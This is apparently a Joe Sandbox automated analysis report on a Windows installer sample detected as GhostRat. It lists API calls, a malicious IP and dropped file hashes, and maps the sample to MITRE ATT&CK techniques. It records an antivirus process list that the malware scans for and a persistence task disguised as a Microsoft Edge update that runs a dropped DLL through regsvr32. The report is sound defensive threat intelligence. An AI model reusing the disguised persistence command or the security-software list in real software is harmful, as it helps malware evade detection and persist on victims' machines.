Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 5_2_00007FFE01417C90 GetCurrentProcessId,ProcessPrng,HeapFree,CreateNamedPipeW,GetLastError,HeapFree,HeapFree,HeapFree,CloseHandle,HeapFree,HeapFree,HeapFree,HeapFree,CloseHandle,

5_2_00007FFE01417C90

Source: C:\Windows\System32\regsvr32.exe

Code function: 5_2_02E515C0 Sleep,SleepEx,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,RegOpenKeyExW,Sleep,SleepEx,RegOpenKeyExW,RegQueryValueExW,Sleep,WaitForSingleObject,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,

5_2_02E515C0

Source: C:\Windows\System32\regsvr32.exe

Code function: 5_2_02E5FF94 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

5_2_02E5FF94

Source: C:\Windows\System32\regsvr32.exe

Code function: 5_2_02E5BA94 HeapCreate,GetVersion,HeapSetInformation,

5_2_02E5BA94

Source: regsvr32.exe	Binary or memory string: acs.exe
Source: regsvr32.exe	Binary or memory string: vsserv.exe
Source: regsvr32.exe	Binary or memory string: avcenter.exe
Source: regsvr32.exe	Binary or memory string: kxetray.exe
Source: regsvr32.exe	Binary or memory string: KSafeTray.exe
Source: regsvr32.exe	Binary or memory string: avp.exe
Source: regsvr32.exe	Binary or memory string: cfp.exe
Source: regsvr32.exe	Binary or memory string: 360Safe.exe
Source: regsvr32.exe	Binary or memory string: rtvscan.exe
Source: regsvr32.exe	Binary or memory string: 360tray.exe
Source: regsvr32.exe	Binary or memory string: TMBMSRV.exe
Source: regsvr32.exe	Binary or memory string: ashDisp.exe
Source: regsvr32.exe	Binary or memory string: 360Tray.exe
Source: regsvr32.exe	Binary or memory string: avgwdsvc.exe
Source: regsvr32.exe	Binary or memory string: AYAgent.aye
Source: regsvr32.exe	Binary or memory string: RavMonD.exe
Source: regsvr32.exe	Binary or memory string: QUHLPSVC.EXE
Source: regsvr32.exe	Binary or memory string: Mcshield.exe
Source: regsvr32.exe	Binary or memory string: K7TSecurity.exe

Stealing of Sensitive Information

Yara detected GhostRat

Source: Yara match

File source: Process Memory Space: regsvr32.exe PID: 7616, type: MEMORYSTR

Remote Access Functionality

Yara detected GhostRat

Source: Yara match

File source: Process Memory Space: regsvr32.exe PID: 7616, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Replication Through Removable Media	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	121 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 Windows Service	1 Access Token Manipulation	3 Obfuscated Files or Information	LSASS Memory	11 Peripheral Device Discovery	Remote Desktop Protocol	1 Screen Capture	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Windows Service	1 DLL Side-Loading	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	121 Input Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	423 Process Injection	1 Masquerading	NTDS	36 System Information Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Scheduled Task/Job	1 Modify Registry	LSA Secrets	231 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	21 Virtualization/Sandbox Evasion	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	423 Process Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Regsvr32	/etc/passwd and /etc/shadow	2 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Indicator Removal	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
RXxeYma4d5.exe	45%	ReversingLabs	Win32.Packed.Generic

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-I3JO9.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-I3JO9.tmp\_isetup\_shfoldr.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-I54BB.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-I54BB.tmp\_isetup\_shfoldr.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\is-HU557.tmp	4%	ReversingLabs
C:\Users\user\AppData\Local\unins000.exe (copy)	4%	ReversingLabs
C:\Users\user\AppData\Roaming\Setup_Cow.dll (copy)	61%	ReversingLabs	Win64.Packed.Generic
C:\Users\user\AppData\Roaming\is-I9R0P.tmp	61%	ReversingLabs	Win64.Packed.Generic

Name	Source	Malicious	Reputation
http://www.innosetup.com/	RXxeYma4d5.exe, 00000000.00000003.1666133308.0000000002440000.00000004.00001000.00020000.00000000.sdmp, RXxeYma4d5.exe, 00000000.00000003.1666348689.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, RXxeYma4d5.tmp, 00000001.00000000.1666946979.0000000000401000.00000020.00000001.01000000.00000004.sdmp, RXxeYma4d5.tmp.2.dr, is-HU557.tmp.3.dr, RXxeYma4d5.tmp.0.dr	false	high
http://nuget.org/NuGet.exe	powershell.exe, 00000006.00000002.1756750432.000001F411485000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1883487909.00000282437F5000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000008.00000002.1804406305.00000282339AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1894153184.000002824BC80000.00000004.00000020.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000008.00000002.1804406305.00000282339AA000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000006.00000002.1728970401.000001F401638000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1804406305.00000282339AA000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000008.00000002.1804406305.00000282339AA000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000006.00000002.1728970401.000001F401638000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1804406305.00000282339AA000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 00000008.00000002.1883487909.00000282437F5000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 00000006.00000002.1756750432.000001F411485000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1883487909.00000282437F5000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 00000008.00000002.1883487909.00000282437F5000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 00000008.00000002.1883487909.00000282437F5000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.microsoft.	powershell.exe, 00000006.00000002.1768623458.000001F47F95B000.00000004.00000020.00020000.00000000.sdmp	false	high
https://aka.ms/pscore68	powershell.exe, 00000006.00000002.1728970401.000001F401411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1804406305.0000028233781000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.remobjects.com/ps	RXxeYma4d5.exe, 00000000.00000003.1666133308.0000000002440000.00000004.00001000.00020000.00000000.sdmp, RXxeYma4d5.exe, 00000000.00000003.1666348689.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, RXxeYma4d5.tmp, 00000001.00000000.1666946979.0000000000401000.00000020.00000001.01000000.00000004.sdmp, RXxeYma4d5.tmp.2.dr, is-HU557.tmp.3.dr, RXxeYma4d5.tmp.0.dr	false	high
https://docs.rs/getrandom#nodejs-es-module-support/rust/deps	RXxeYma4d5.tmp, 00000003.00000003.1675966181.0000000005B30000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.2928011168.00007FFE01443000.00000002.00000001.01000000.00000009.sdmp, is-I9R0P.tmp.3.dr	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000006.00000002.1728970401.000001F401411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1804406305.0000028233781000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/Pester/Pester	powershell.exe, 00000008.00000002.1804406305.00000282339AA000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
23.235.165.54	unknown	United States		136800	XIAOZHIYUN1-AS-APICIDCNETWORKUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582584
Start date and time:	2024-12-30 23:11:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	RXxeYma4d5.exe renamed because original name is a hash value
Original Sample Name:	6496951be7839af7461c7988dd4d324f.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@20/21@0/1
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 96% Number of executed functions: 85 Number of non-executed functions: 215
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 7644 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7872 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: RXxeYma4d5.exe

Simulations

Behavior and APIs

Time	Type	Description
17:11:57	API Interceptor	42x Sleep call for process: powershell.exe modified
17:12:57	API Interceptor	1005224x Sleep call for process: regsvr32.exe modified
22:12:09	Task Scheduler	Run new task: MicrosoftEdgeUpdateTaskMachineUA{8208A45D-F29A-4A60-CBD5-99028FB966B8} path: regsvr32 s>/S /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
XIAOZHIYUN1-AS-APICIDCNETWORKUS	vcimanagement.armv7l.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.253.103.137
	vcimanagement.mipsel.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.254.252.201
	vcimanagement.mips.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.234.199.209
	vcimanagement.x86.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.255.154.138
	vcimanagement.m68k.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.241.23.75
	Wk6IMAhBNF.exe	Get hash	malicious	GhostRat	Browse	103.199.100.130
	aQ7bSXduYp.exe	Get hash	malicious	GhostRat, Nitol	Browse	156.225.22.155
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	103.199.102.178
	nsharm.elf	Get hash	malicious	Mirai	Browse	156.234.199.255
	loligang.arm7.elf	Get hash	malicious	Mirai	Browse	156.234.199.204

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	017069451a4dbc523a1165a2f1bd361a762bb40856778.exe	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Temp\is-I3JO9.tmp\_isetup\_setup64.tmp	017069451a4dbc523a1165a2f1bd361a762bb40856778.exe	Get hash	malicious	Unknown	Browse
	vc8Kx5C54G.exe	Get hash	malicious	Socks5Systemz	Browse
	AbC0LBkVhr.exe	Get hash	malicious	Socks5Systemz	Browse
	Mg5bMQ2lWi.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	KRdh0OaXqH.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	wG1fFAzGfH.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	AGcC2uK0El.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	6hvZpn91O8.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	j9htknb7BQ.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	AMS_Client_SSO.exe	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	017069451a4dbc523a1165a2f1bd361a762bb40856778.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41rinyps.xlm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fhz10a0f.wto.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hhxsko0z.2vx.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iyek4is0.htl.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_loixfcyb.03j.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ofuqpfwj.p5u.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qeeagnrb.0lp.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v23tiosc.ond.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp

Download File

Process:	C:\Users\user\Desktop\RXxeYma4d5.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1223168
Entropy (8bit):	6.330739929540704
Encrypted:	false
SSDEEP:	24576:tYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5QNx9Ie:MGUhni7iSFCQij
MD5:	D5A634439F2ABA0A8D26F31577C73343
SHA1:	7B86B632DDFC82EBC58861A3968B3D2138CD9D53
SHA-256:	B61A425A51DB33911BDC3B8CD89DD2FB47B9E6CDFABCBCAE29391B3568EED198
SHA-512:	A3A426FB963436E9C467506FEC6EF9C3919A9AB1CA15F92759B37672D0F3BDCC026B2A44A7AF684EA46455EE3216307E5818C282F7BDBCAD6C45DF24B1EE5AC7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
